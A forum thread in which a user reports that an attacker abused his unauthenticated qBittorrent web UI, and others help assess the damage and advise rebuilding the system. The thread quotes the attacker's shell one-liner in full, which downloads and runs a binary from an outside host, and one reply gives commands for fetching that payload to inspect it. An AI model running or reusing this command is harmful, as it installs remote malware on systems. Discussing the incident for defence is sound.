Malware installed through qBittorrent?

chrismox · 10 Jul 2020 at 11:22

I have qBittorrent on my server and the webUI has been accessible without authentification. I only use the software very rarely and not for anything “dodgy”, so I never saw the need for authentification until today when I got a random notification that it had just finished downloading something that I hadn’t asked for. The log below tells the story:

it would seem that someone has logged in, changed the options so that a command is run upon completion of a download, started a tiny download which then completes (the command is run), removed the download and removed the amended settings.

The command is:
sh -c "/bin/rm -rf $HOME/srunner;wget -P $HOME/ http://vps.daswf852.pw/srunner;chmod a+x $HOME/srunner;$HOME/srunner"

Any idea what damage might have been done?

Obviously I have since corrected my stupidity and removed access to the webUI.

EDIT - the server is running Windows 10 the command looks to me like a Linux one, so hopefully has done nothing...?!

Thanks in advance.

opethdisciple · 10 Jul 2020 at 12:20

It looked like it downloaded and executed a script.

srunner is the name of the script it ran.

Does this exist on your server: $HOME/srunner ?

$HOME will be the name of the current user at the time the command was ran.

If it was me I would be doing a reformat and reinstall of your server just to be on the safe side.

Did you have anything valuable on the server, that they could steal?

What you could do in a temporary linux VM is wget this http://vps.daswf852.pw/srunner and then cat the file.

That will tell you what it did. Don't make the file executable tho. All you want to do is read it.

So:

cd /var/tmp
wget http://vps.daswf852.pw/srunner
cat srunner

I did a quick Google for srunner but I cant figure out what it is. It seems to be something related to embedded devices. I do hope that means they haven't installed a rootkit on the system.

Semple · 10 Jul 2020 at 12:28

As above, without seeing what the script does, we can only speculate on what it might be doing.

chrismox · 10 Jul 2020 at 12:34

Thanks for the replies.

The server doesn't have much of importance on it, mostly photos, videos and so on.

I'm probably exposing my ignorance, but as my server is running Windows, can the script be executed at all if it's not a Linux system?

Deleted member 77746 · 10 Jul 2020 at 13:30

chrismox said:
I'm probably exposing my ignorance, but as my server is running Windows, can the script be executed at all if it's not a Linux system?

No not if it's a linux script unless you have some plugin able to read it. Remove qbittorrent asap and use something else. Change the port, username and password pronto.

opethdisciple · 10 Jul 2020 at 14:31

Yes if you have the Windows Subsystem for Linux installed.

chrismox · 10 Jul 2020 at 16:59

opethdisciple said:
Yes if you have the Windows Subsystem for Linux installed.

I've not heard of it, so I guess not!

MonkeyBasher · 10 Jul 2020 at 17:19

chrismox said:
I've not heard of it, so I guess not!

Security is not really on your list of priorities is it.

You had the web gui on a torrent client open to the internet.
You had no password.
Your now assuming because you haven't heard of something it is not installed.

this is a windows 10 box. MS installs tonnes of random stuff you will never use.

That log you posted reported no error messages at all.
You have no idea if the script ran. If it did you have no idea what it did.
Its name is irrelevant as is the URL its hosted at. Both are random and temporary in order to not be trackable.
Its most likely called srunner so it can pretend to be something it is not.

Close that port on your router.
Close any other ports you do not have secured.
Format the PC.
Use a different torrent client and don't enable the web facing gui.

If you have used that PC to fill in any UN/PW on any websites those credentials need to be changed as do any email accounts you had setup on there.

moogle · 10 Jul 2020 at 23:45

Looks like an exploit/security flaw in qBittorrent. However since you're running a Windows version it'll have done nothing. I downloaded the file and it looks like an ELF binary (Linux executable).
The commands seperated by the semi colon were just multi-line commands so it looks like it would delete an existing srunner program, download a new one to the same location, mark it as executable and then run it.

Just secure your client or change torrent client. I'd be tempted to report it to the qBittorrent devs as well so they can investigate how it could have happened.

chrismox · 11 Jul 2020 at 12:16

moogle said:
Looks like an exploit/security flaw in qBittorrent. However since you're running a Windows version it'll have done nothing. I downloaded the file and it looks like an ELF binary (Linux executable).
The commands seperated by the semi colon were just multi-line commands so it looks like it would delete an existing srunner program, download a new one to the same location, mark it as executable and then run it.

Just secure your client or change torrent client. I'd be tempted to report it to the qBittorrent devs as well so they can investigate how it could have happened.

Thanks moogle. I’d come to the same conclusion, although I hadn’t got as far as examining the file in any detail.

I’m not sure there’s much to report to the devs as it’s not really a fault in the software, just that I was daft enough not to password protect its UI.

I’ve secured the client and given myself a good telling-off.

andshrew · 12 Jul 2020 at 11:56

I think you're making two mistakes here.

You've exposed a service to the internet without putting it behind strong authentication or a VPN.
You're assuming that what you see in that log is everything the person that accessed the system was able to do. (ie. if one person accessed it, whats to say more savy people hadn't previously accessed it but covered their tracks by editing the logs)

You have a system you know has been accessed remotely at least once, the only sensible thing to do is to rebuild it.

On Holiday · 12 Jul 2020 at 12:01

andshrew said:
I think you're making two mistakes here.

You've exposed a service to the internet without putting it behind strong authentication or a VPN.

You're assuming that what you see in that log is everything the person that accessed the system was able to do. (ie. if one person accessed it, whats to say more savy people hadn't previously accessed it but covered their tracks by editing the logs)

You have a system you know has been accessed remotely at least once, the only sensible thing to do is to rebuild it.

This.

http://vps.daswf852.pw/

https://github.com/Daswf852
https://www.reddit.com/user/daswf852/

Maybe you could ask them what it does